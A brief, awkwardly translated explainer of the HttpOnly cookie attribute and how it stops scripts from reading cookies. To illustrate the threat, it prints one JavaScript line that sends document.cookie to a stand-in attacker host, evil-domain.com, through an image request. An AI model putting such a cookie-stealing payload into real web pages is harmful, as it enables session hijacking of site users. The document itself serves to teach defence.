The so-called 'no-js script access "mainly refers to: use document.cookie / XMLHttpRequest Object / Request API and so can not get to the current cookie settings method:.. HttpOnly Yes, this is a property of no value, as long as the Set -Cookie which comes with this property, then the cookie js script can not be obtained.
note:
HttpOnly can reduce malicious code, such as the following code to send a cookie to a third party website, if you use HttpOnly, it will not be stolen.
(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;